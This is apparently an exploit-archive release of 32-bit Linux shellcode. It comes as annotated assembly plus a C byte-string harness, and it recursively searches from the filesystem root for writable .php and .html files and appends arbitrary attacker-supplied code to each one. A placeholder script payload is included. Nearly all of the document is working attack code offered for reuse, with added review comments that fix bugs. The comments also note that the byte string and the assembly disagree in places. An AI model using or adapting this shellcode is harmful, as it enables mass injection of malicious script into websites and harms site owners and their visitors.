
# Title : Linux/x86 Search For php,html Writable Files and Add Your Code
# Published : 2012-01-17
# Author :


; Title : Linux/x86 Search php,html writable files and add your code.
; Date  : 2011-10-24 
; Author: rigan - imrigan [sobachka ] gmail.com
; Size  : 380 bytes + your code.
;
; Note  : This shellcode appends your code to the end of every file it
;         finds whose name contains ".html" or ".php" and that the running
;         process may write (access(W_OK)). The search starts at "/" and
;         descends recursively, skipping symlinks, dot-entries and names
;         beginning with "proc".

 

BITS 32

section .text
global _start
_start:
;======================================================================;
;                               main                                   ;
;======================================================================;
; Entry point.  Contract handed to search (hand-rolled, not C ABI):
;   [esp]      -> "." NUL-terminated: the directory name search reads
;                 at [ebp+8]; the 4-byte slot above it ([ebp+12]) is
;                 reused by search as scratch for its directory fd
;   eax = 0       search sizes its frame with "mov al, 250 / sub esp, eax"
; The jmp/call pair below pushes the address of the exit sequence as
; search's return address, so when the walk finishes it lands in exit(0).
              ; chdir("/")  -- result not checked; if it fails the walk
              ; simply starts from whatever the cwd already was
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2f         ; '/'
                mov ebx, esp
                mov al, 12                   ; __NR_chdir
                int 0x80
            
              ; build "." on the stack: 4 zero bytes, then the '.' in front
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e         ; '.'
               
                jmp SHORT .exit

.jmp_search: 
                jmp SHORT search      

.exit:
                call .jmp_search             ; -> search; its ret returns here
         
              ; exit(0)   
                xor eax, eax
                xor ebx, ebx
                mov al, 1                    ; __NR_exit
                int 0x80

;======================================================================;
;                               inject                                 ;
;======================================================================;
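inject:
; inject -- append the payload to one file.
;   In:  edi -> NUL-terminated file name (relative to the cwd)
;        esi -> payload bytes, length = the "mov dl, N" below
;   Out: nothing; clobbers eax, ebx, ecx, edx and flags
; Fixes vs. the original listing: the file is opened O_WRONLY (the
; original passed 2 = O_RDWR, which fails on a file that is writable but
; not readable even though search's access(W_OK) approved it); a failed
; open() is detected instead of feeding -errno to lseek/write/close; and
; close() is given the real descriptor (the original zeroed ebx first and
; so closed fd 0, leaking one fd per injected file).
               ; fd = open(file, O_WRONLY)
                xor eax, eax
                mov ebx, edi
                xor ecx, ecx
                mov cl, 1                    ; O_WRONLY
                mov al, 5                    ; __NR_open
                int 0x80

               ; negative eax = -errno -> nothing to write to
                test eax, eax
                js .done
                                               
              ; lseek(fd, 0, SEEK_END)
                mov ebx, eax                 ; ebx = fd, kept until close
                xor ecx, ecx
                xor eax, eax
                cdq                          ; edx = 0 (eax is 0) ...
                mov dl, 2                    ; ... then SEEK_END
                mov al, 19                   ; __NR_lseek
                int 0x80
    
              ; write(fd, your_code, sizeof(your_code))
              ; edx's upper bytes are still 0, so dl is the whole count
                xor eax, eax
                mov ecx, esi
                mov dl, 43   ; <- TO CHANGE THE SIZE HERE (must equal the db length).
                mov al, 4                    ; __NR_write
                int 0x80 

              ; close(fd) -- ebx still holds the descriptor
                xor eax, eax
                mov al, 6                    ; __NR_close
                int 0x80 
.done:
                ret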
                
;======================================================================;
;                               substr                                 ;
;======================================================================;
        
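substr:
; substr -- does the needle occur anywhere in the file name?
;   In:  edi -> NUL-terminated haystack (the file name)
;        esi -> NUL-terminated needle (".html" / ".php")
;   Out: eax = 2 if the needle occurs anywhere in the haystack (not
;        necessarily as a suffix, so "x.php.bak" matches), else eax = 0
;        clobbers eax, ebx, ecx and flags; edx/esi/edi are preserved
; Fix vs. the original listing: on a partial match that then mismatched
; the original gave up instead of retrying from the next haystack
; position, so e.g. "a.ht.html" was never matched.  Here ebx walks the
; candidate start and ecx the offset within the candidate, so a mismatch
; simply advances ebx.  The original also skipped haystack index 0; the
; callers never pass a name starting with '.' (those are filtered in
; search), so starting at 0 is equivalent for them.
; No 0x00 bytes in the encoding (shellcode constraint).
                mov ebx, edi
                dec ebx                      ; pre-decrement: first inc -> edi
.next_start:
                inc ebx
                mov al, [ebx]
                test al, al                  ; end of haystack -> not found
                jz .not_found
                xor ecx, ecx
.compare:
                mov al, [esi + ecx]
                test al, al                  ; end of needle -> every byte matched
                jz .found
                cmp al, [ebx + ecx]
                jne .next_start              ; mismatch: try the next start
                inc ecx
                jmp short .compare
.found:
                xor eax, eax
                mov al, 2
                ret
.not_found:
                xor eax, eax
                ret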
                
;======================================================================;
;                               search                                 ;
;======================================================================;
; search -- depth-first walk of the current directory, injecting into
; every writable entry whose name contains ".html" or ".php".
;
; Calling convention (hand-rolled, not C):
;   [ebp+8]   -> "." NUL-terminated, pushed by the caller (both _start
;                and the recursive call below push 4 zero bytes then a
;                '.' byte); used as the directory name for open()
;   [ebp+12]     caller-owned slot reused here as scratch for the dir fd
;   eax = 0      at entry -- the frame size is built with "mov al, 250"
; On return the caller's cwd is restored with chdir("..").  Every general
; register is clobbered.
;
; Frame (250 bytes below ebp):
;   [esp+0  ..]  stat buffer for lstat (st_mode is read at +16)
;   [esp+100 ..] old_linux_dirent filled by readdir; d_name starts at
;                +10, i.e. [esp+110]
; NOTE(review): only ~140 bytes separate [esp+110] from the saved ebp and
; return address, while an entry name can be much longer (Linux NAME_MAX
; is 255); a long name would overwrite the saved frame -- confirm the
; exact headroom, it grows as the never-popped pushes below move esp down.
search:
                push ebp
                mov ebp, esp
                
                
              ; esp -= 250 (relies on eax == 0 at entry, see above)
                mov al, 250
                sub esp, eax
               
              ; fd = open(".", O_RDONLY)   (ecx = 0 is O_RDONLY)
                xor eax, eax
                xor ecx, ecx
                lea ebx, [ebp + 8]
                mov al, 5
                int 0x80
         
              ; open failed -> just chdir("..") and return
                test eax, eax
                js .old_dirent
      
                mov [ebp + 12], eax    

.while:
              ; readdir(fd, (struct old_linux_dirent *)(esp+100), count)
              ; count (edx) is whatever was left in edx; the old one-entry
              ; readdir syscall presumably ignores it -- verify
                mov esi, [ebp + 12]
                mov ebx, esi
                xor eax, eax
                xor ecx, ecx
                lea ecx, [esp + 100]
                mov al, 89
                int 0x80
         
              ; 0 = end of directory.  Anything else is treated as "got
              ; an entry" -- including a negative -errno, which would
              ; re-process the stale buffer.  NOTE(review): "jg .l1"
              ; would stop on errors as well.
                test eax, eax
                jnz .l1

              ; closedir(fd)
                xor eax, eax
                xor ebx, ebx
                mov ebx, esi
                mov al, 6
                int 0x80

.old_dirent:         
              ; chdir("..") -- undo the caller's chdir into this directory
                xor eax, eax
                push eax
                push WORD 0x2e2e
                mov ebx, esp
                mov al, 12
                int 0x80

                leave 
                ret

.l1:
                lea edx, [esp + 110]          ; edx -> d_name
                
              ; skip any entry whose name STARTS with "proc" (meant to
              ; avoid /proc, but applied at every depth as a prefix match)
                cmp DWORD [edx], 0x636f7270   ; "proc" little-endian
                je .while                     ; ...next entry
         
              ; skip ".", ".." and every other dot-entry
                cmp BYTE [edx], 0x2e
                jne .l2
                
                jmp  .while

.l2:
              ; lstat(d_name, stat buffer at esp) -- the result is not
              ; checked, so on failure the mode test below reads whatever
              ; the buffer held from the previous entry
                mov ebx, edx
                mov ecx, esp
                xor eax, eax
                mov al, 196
                int 0x80 
         
              ; cx = 0xEFFF+1 = 0xF000 (S_IFMT), bx = 0x9FFF+1 = 0xA000
              ; (S_IFLNK); built with inc to keep 0x00 out of the immediates
                mov cx, 61439
                mov bx, 40959
                inc ecx   
                inc ebx
                mov eax, [esp + 16]           ; st_mode
         
                and ax, cx
         
              ; symlinks are skipped entirely, so links are never followed
                cmp ax, bx
                jne .l3
                
                jmp .while

.l3:
              ; push "." as the callee's [ebp+8].  These 5 bytes are never
              ; popped, so esp creeps down per subdirectory until leave.
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e
         
              ; chdir(d_name): succeeds only for a directory we may enter
              ; -> recurse (eax is 0 here, as search requires)
                mov ebx, edx
                mov al, 12
                int 0x80
         
                test eax, eax
                jne .l4
         
                call search
                
                jmp .while

.l4:   
              ; not a directory (or chdir refused): access(d_name, W_OK)
                xor eax, eax
                mov ebx, edx
                xor ecx, ecx
                mov cl, 2                     ; W_OK
                mov al, 33
                int 0x80
         
       
              ; 0 = writable by us, anything else -> next entry
                test eax, eax
                jz .check_html
                
                jmp .while

;======================================================================;
;                               check_html                             ;
;======================================================================;
.check_html:
              ; build ".html" on the stack (9 bytes, never popped)
                xor eax, eax
                push eax
                push DWORD 0x6c6d7468   ; "html"
                sub esp, BYTE 0x1       ; 
                mov BYTE [esp], 0x2e    ; '.' -> ".html"
                
              ; substr(edi = d_name, esi = ".html") -> al == 2 on a match
              ; anywhere in the name, so "x.html.bak" also qualifies
                mov esi, esp         
                mov edi, edx         
                call substr
         
                cmp BYTE al, 2
                je .do_inject

;======================================================================;
;                               check_php                              ;
;======================================================================;               
.check_php:     
              ; build ".php" on the stack (8 bytes, never popped);
              ; edi still -> d_name
                xor eax, eax
                push eax
                push DWORD 0x7068702e   ; ".php"
               
                mov esi, esp         
                
                call substr
                
                cmp BYTE al, 2
                je .do_inject
                
                jmp .while 

;======================================================================;
;                               do_inject                              ;
;======================================================================;
.do_inject: 
              ; jmp/call/pop: the call in .your_code pushes the address of
              ; the bytes that follow it, which .write pops into esi
                jmp SHORT .your_code
                
.write:  
                pop  esi    ; esi -> payload (edi still -> d_name)
                
                call inject
                
                jmp .while

;======================================================================;  
;                               your_code                              ;
;======================================================================;
 .your_code:
               call .write
                                                                                               
; Payload bytes.  inject writes exactly the count set by "mov dl, N" in
; inject (43 for the string below); change the two together.
; NOTE(review): the second <script> has no slash, so as written the HTML
; never closes the script element; writing </script> makes it 44 bytes.
                                                                                                
db '<html><script>alert("pwn3d")<script></html>' ;<- You can change it.

; Don't forget to change the size of your code (the "mov dl, N" in inject must equal the length of the db line above)!
------------------------------------------------------------------------ 
                         
             
              Below is the same shellcode as a C byte string with a test harness (380 bytes of code followed by the 43-byte payload).
                              

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

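/*
 * Assembled bytes of the listing above: 380 bytes of code followed by the
 * 43-byte payload.  The copy on this page had lost its backslashes
 * ("x31xc0..."), which made the array a 1000+ character ASCII string
 * rather than machine code; the \x escapes are restored here.  There is
 * no 0x00 byte anywhere, so strlen() yields the true length (423).
 *
 * One difference from the asm source as printed: inject's close() here is
 * "31 c0 b0 06 cd 80" (ebx still holds the descriptor), whereas the
 * source has an extra "xor ebx, ebx" that would close fd 0 instead.
 */
char shellcode[] =
    /* _start: chdir("/"), push ".", call search, exit(0)         (43 bytes) */
    "\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2f\x89\xe3\xb0\x0c\xcd\x80"
    "\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2e\xeb\x02\xeb\x63\xe8\xf9"
    "\xff\xff\xff\x31\xc0\x31\xdb\xb0\x01\xcd\x80"
    /* inject: open(O_RDWR), lseek(SEEK_END), write, close        (44 bytes) */
    "\x31\xc0\x89\xfb\x31\xc9\xb1\x02\xb0\x05\xcd\x80"
    "\x31\xdb\x89\xc3\x31\xc9\x31\xc0\x99\xb2\x02\xb0\x13\xcd\x80"
    "\x31\xc0\x89\xf1\xb2\x2b\xb0\x04\xcd\x80"    /* b2 2b = payload size 43 */
    "\x31\xc0\xb0\x06\xcd\x80\xc3"
    /* substr                                                     (42 bytes) */
    "\x31\xc0\x31\xdb\x31\xc9\x99"
    "\x42\x8a\x1c\x17\x84\xdb\x74\x1a\x3a\x1e\x75\xf4"
    "\x8a\x04\x0e\x8a\x1c\x17\x84\xc0\x74\x08\x41\x42\x38\xc3\x74\xf0\xeb\x04"
    "\x31\xc0\xb0\x02\xc3"
    /* search                                                    (251 bytes) */
    "\x55\x89\xe5\xb0\xfa\x29\xc4"
    "\x31\xc0\x31\xc9\x8d\x5d\x08\xb0\x05\xcd\x80\x85\xc0\x78\x22\x89\x45\x0c"
    "\x8b\x75\x0c\x89\xf3\x31\xc0\x31\xc9\x8d\x4c\x24\x64\xb0\x59\xcd\x80\x85\xc0\x75\x19"
    "\x31\xc0\x31\xdb\x89\xf3\xb0\x06\xcd\x80"
    "\x31\xc0\x50\x66\x68\x2e\x2e\x89\xe3\xb0\x0c\xcd\x80\xc9\xc3"
    "\x8d\x54\x24\x6e\x81\x3a\x70\x72\x6f\x63\x74\xc6\x80\x3a\x2e\x75\x05\xe9\xbc\xff\xff\xff"
    "\x89\xd3\x89\xe1\x31\xc0\xb0\xc4\xcd\x80\x66\xb9\xff\xef\x66\xbb\xff\x9f"
    "\x41\x43\x8b\x44\x24\x10\x66\x21\xc8\x66\x39\xd8\x75\x05\xe9\x97\xff\xff\xff"
    "\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2e\x89\xd3\xb0\x0c\xcd\x80"
    "\x85\xc0\x75\x0a\xe8\x65\xff\xff\xff\xe9\x79\xff\xff\xff"
    "\x31\xc0\x89\xd3\x31\xc9\xb1\x02\xb0\x21\xcd\x80\x85\xc0\x74\x05\xe9\x64\xff\xff\xff"
    "\x31\xc0\x50\x68\x68\x74\x6d\x6c\x83\xec\x01\xc6\x04\x24\x2e\x89\xe6\x89\xd7"
    "\xe8\x09\xff\xff\xff\x3c\x02\x74\x18"
    "\x31\xc0\x50\x68\x2e\x70\x68\x70\x89\xe6\xe8\xf6\xfe\xff\xff\x3c\x02\x74\x05\xe9\x30\xff\xff\xff"
    "\xeb\x0b\x5e\xe8\xb9\xfe\xff\xff\xe9\x23\xff\xff\xff"
    "\xe8\xf0\xff\xff\xff"
    /* payload: <html><script>alert("pwn3d")<script></html>       (43 bytes) */
    "\x3c\x68\x74\x6d\x6c\x3e\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c"
    "\x65\x72\x74\x28\x22\x70\x77\x6e\x33\x64\x22\x29\x3c\x73\x63\x72"
    "\x69\x70\x74\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e";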
    
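/*
 * Test harness: make the page(s) holding the byte string executable and
 * jump into it.  The array lives in writable .data, which current
 * toolchains map non-executable, so without the mprotect() (or linking
 * with -z execstack) the indirect call faults immediately.
 *
 * WARNING: this is not a harmless demo.  The code chdir()s to "/" and
 * appends the payload to every .php/.html file the current user can
 * write, recursively.  Run it only in a throwaway VM or container.
 * Build as 32-bit (-m32): the code is BITS 32 and uses int 0x80 with
 * i386 syscall numbers.
 */
int main(void)
{
    long page = sysconf(_SC_PAGESIZE);
    uintptr_t begin = (uintptr_t)shellcode & ~(uintptr_t)(page - 1);
    uintptr_t end = ((uintptr_t)shellcode + sizeof(shellcode) + (uintptr_t)page - 1)
                    & ~(uintptr_t)(page - 1);

    if (mprotect((void *)begin, end - begin, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }

    /* strlen() doubles as a NUL-byte check: anything below the expected
     * 380 + payload length means a 0x00 crept into the shellcode. */
    printf("%zu\n", strlen(shellcode));

    ((void (*)(void)) shellcode)();
    return 0;
}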